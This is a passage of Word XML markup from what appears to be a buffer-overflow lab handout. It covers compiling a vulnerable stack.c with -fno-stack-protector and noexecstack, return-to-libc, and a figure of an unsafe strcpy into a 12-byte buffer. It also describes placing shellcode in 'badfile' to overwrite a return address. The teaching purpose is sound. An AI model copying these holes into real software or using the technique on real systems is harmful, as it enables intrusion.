        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>executable.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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task,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recompile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>our</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>using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rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>noexecstack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-59"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>option,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repeat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attack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Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="36"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>get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shell?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="36"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>not,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>what</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-49"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is the problem?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>How does this protection scheme make your attacks difficult.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>You should describe your</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>observation and explanation in your lab report. You can use the following instructions to turn on the non-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>executable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>protection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="700" w:footer="0" w:top="1280" w:bottom="280" w:left="1280" w:right="100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4"/>
        <w:ind w:left="42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gcc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>-o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stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>-fno-stack-protector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-z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noexecstack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stack.c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="256" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="160" w:right="437" w:firstLine="338"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>It should be noted that non-executable stack only makes it impossible to run shellcode on the stack, but it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>prevent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>buffer-overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>attacks,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>because</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12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other</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ways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run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>malicious</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>after</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploiting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>a buffer-overflow vulnerability. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>return-to-libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>attack is an example. We have designed a seperate lab for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attack.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11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interested,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>please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Return-to-Libc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Lab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details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="256" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="160" w:right="437" w:firstLine="338"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If you are using our Ubuntu 12.04 VM, whether the non-executable stack protection works or not de-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>pends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CPU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setting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virtual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>machine,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protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>depends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hardware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>feature that is provided by CPU. If you find that the non-executable stack protection does not work, check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>our</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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(“Notes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Non-Executable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Stack”)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linked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lab’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>page,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53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>instruction in the document can help solve your problem. If not, then you may need to figure out the problem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>yourself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9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590" w:val="left" w:leader="none"/>
          <w:tab w:pos="591" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="590" w:right="0" w:hanging="431"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Guidelines</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="256" w:lineRule="auto" w:before="231"/>
        <w:ind w:left="160" w:right="439"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:64.332710pt;margin-top:86.694817pt;width:455.6pt;height:176.3pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-16247808" coordorigin="1287,1734" coordsize="9112,3526">
            <v:shape style="position:absolute;left:6358;top:2828;width:152;height:1458" coordorigin="6358,2829" coordsize="152,1458" path="m6510,4286l6483,4278,6460,4262,6443,4239,6435,4211,6435,3622,6427,3594,6410,3570,6387,3553,6358,3545,6387,3537,6410,3521,6427,3498,6435,3470,6435,2906,6443,2877,6460,2854,6483,2838,6510,2829e" filled="false" stroked="true" strokeweight=".202382pt" strokecolor="#000000">
              <v:path arrowok="t"/>
              <v:stroke dashstyle="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:8999;top:3632;width:94;height:94" coordorigin="8999,3632" coordsize="94,94" path="m9093,3632l8999,3679,9093,3725,9093,3632xe" filled="true" fillcolor="#000000" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:rect style="position:absolute;left:1288;top:1735;width:9108;height:3522" filled="false" stroked="true" strokeweight=".202382pt" strokecolor="#000000">
              <v:stroke dashstyle="solid"/>
            </v:rect>
            <v:shape style="position:absolute;left:9066;top:2213;width:932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sz w:val="15"/>
                      </w:rPr>
                      <w:t>High</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT"/>
                        <w:spacing w:val="3"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT"/>
                        <w:sz w:val="15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9082;top:3507;width:1237;height:258" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="371" w:val="left" w:leader="none"/>
                      </w:tabs>
                      <w:spacing w:before="72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w w:val="104"/>
                        <w:position w:val="10"/>
                        <w:sz w:val="13"/>
                        <w:u w:val="single"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:position w:val="10"/>
                        <w:sz w:val="13"/>
                        <w:u w:val="single"/>
                      </w:rPr>
                      <w:tab/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-12"/>
                        <w:position w:val="10"/>
                        <w:sz w:val="13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Current</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT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FP</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:9106;top:4520;width:898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sz w:val="15"/>
                      </w:rPr>
                      <w:t>Low</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT"/>
                        <w:spacing w:val="3"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT"/>
                        <w:sz w:val="15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2500;top:4949;width:1482;height:18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105"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>(a)</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT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A</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT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code</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT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example</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:6690;top:4949;width:2392;height:18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105"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>(b)</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT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Active</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT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Stack Frame</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT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in func()</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:1774;top:2221;width:3643;height:2186" type="#_x0000_t202" filled="false" stroked="true" strokeweight=".202382pt" strokecolor="#000000">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="264" w:lineRule="auto" w:before="80"/>
                      <w:ind w:left="459" w:right="1742" w:hanging="142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105"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>void func (char *str) {</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT"/>
                        <w:spacing w:val="-4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char</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT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buffer[12];</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="264" w:lineRule="auto" w:before="0"/>
                      <w:ind w:left="459" w:right="180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105"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>int</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT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variable_a;</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT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strcpy</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT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(buffer,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT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str);</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:before="0"/>
                      <w:ind w:left="317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104"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>}</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="240" w:lineRule="auto" w:before="2"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT"/>
                        <w:sz w:val="19"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:before="1"/>
                      <w:ind w:left="317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105"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>Int main()</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT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{</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="264" w:lineRule="auto" w:before="18"/>
                      <w:ind w:left="459" w:right="223" w:firstLine="0"/>
                      <w:jc w:val="left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w w:val="105"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>char *str = “I am greater than 12 bytes”;</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT" w:hAnsi="Arial MT"/>
                        <w:spacing w:val="-4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w w:val="105"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>func</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT" w:hAnsi="Arial MT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w w:val="105"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>(str);</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:before="0"/>
                      <w:ind w:left="317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104"/>
                        <w:sz w:val="16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06.327759pt;margin-top:153.779556pt;width:9.6pt;height:45.85pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:15729664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Arial MT"/>
                      <w:sz w:val="13"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Arial MT"/>
                      <w:spacing w:val="-1"/>
                      <w:w w:val="105"/>
                      <w:sz w:val="13"/>
                    </w:rPr>
                    <w:t>Current</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Arial MT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rFonts w:ascii="Arial MT"/>
                      <w:w w:val="105"/>
                      <w:sz w:val="13"/>
                    </w:rPr>
                    <w:t>Frame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We</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>load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shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>“badfile”,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>but</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>executed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>because</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>our</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>instruction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>pointer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-50"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>pointing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it.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>One</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>thing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return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>address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point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shellcode.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>But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3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>two problems: (1) we do not know where the return address is stored, and (2) we do not know where the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>shellcode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stored.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>answer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questions,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stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>layout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enters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-53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function.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1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r>
        <w:rPr/>
        <w:t>gives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5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="54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7"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="298" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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98" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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98" w:hRule="atLeast"/>
        </w:trPr>
